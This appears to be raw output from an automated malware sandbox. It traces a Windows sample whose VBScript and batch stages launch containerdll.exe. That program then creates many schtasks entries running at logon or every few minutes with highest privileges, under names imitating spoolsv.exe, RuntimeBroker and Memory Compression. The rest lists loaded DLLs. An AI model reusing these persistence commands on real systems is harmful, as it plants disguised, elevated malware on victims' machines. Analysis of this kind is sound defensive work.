Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcD" /sc ONLOGON /tr "'C:\Program Files (x86)\windows multimedia platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcDW" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\windows multimedia platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Desktop\spoolsv.exe'" /f
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Users\Public\Desktop\spoolsv.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 5 /tr "'C:\Users\Public\Desktop\spoolsv.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcDW" /sc MINUTE /mo 5 /tr "'C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /f
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcD" /sc ONLOGON /tr "'C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcDW" /sc MINUTE /mo 10 /tr "'C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "Memory CompressionM" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\Memory Compression.exe'" /f
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "Memory Compression" /sc ONLOGON /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\Memory Compression.exe'" /rl HIGHEST /f
Source: unknown	Process created: C:\Users\Public\Desktop\spoolsv.exe C:\Users\Public\Desktop\spoolsv.exe
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "Memory CompressionM" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\Memory Compression.exe'" /rl HIGHEST /f
Source: unknown	Process created: C:\Users\Public\Desktop\spoolsv.exe C:\Users\Public\Desktop\spoolsv.exe
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ShellExperienceHostS" /sc MINUTE /mo 8 /tr "'C:\Recovery\ShellExperienceHost.exe'" /f
Source: unknown	Process created: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ShellExperienceHost" /sc ONLOGON /tr "'C:\Recovery\ShellExperienceHost.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ShellExperienceHostS" /sc MINUTE /mo 13 /tr "'C:\Recovery\ShellExperienceHost.exe'" /rl HIGHEST /f
Source: unknown	Process created: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcDW" /sc MINUTE /mo 6 /tr "'C:\Windows\Downloaded Program Files\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /f
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcD" /sc ONLOGON /tr "'C:\Windows\Downloaded Program Files\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcDW" /sc MINUTE /mo 11 /tr "'C:\Windows\Downloaded Program Files\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcDW" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\windows portable devices\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /f
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcD" /sc ONLOGON /tr "'C:\Program Files (x86)\windows portable devices\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcDW" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\windows portable devices\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\Recovery\RuntimeBroker.exe'" /f
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Recovery\RuntimeBroker.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcDW" /sc MINUTE /mo 9 /tr "'C:\Windows\Logs\SettingSync\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /f
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcD" /sc ONLOGON /tr "'C:\Windows\Logs\SettingSync\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcDW" /sc MINUTE /mo 13 /tr "'C:\Windows\Logs\SettingSync\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Intodhcp\k6u1xEDPWjfrPQve79LV.vbe"	Jump to behavior
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Intodhcp\file.vbs"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Intodhcp\zSeea0nqF8D7gTEAJAxS8lBZw.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe "C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\Public\Desktop\spoolsv.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\Public\Desktop\spoolsv.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\Public\Desktop\spoolsv.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\Public\Desktop\spoolsv.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\Public\Desktop\spoolsv.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\Public\Desktop\spoolsv.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\Public\Desktop\spoolsv.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\Public\Desktop\spoolsv.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\Desktop\spoolsv.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\Public\Desktop\spoolsv.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\Public\Desktop\spoolsv.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\Public\Desktop\spoolsv.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\Public\Desktop\spoolsv.exe	Section loaded: rsaenh.dll	Jump to behavior
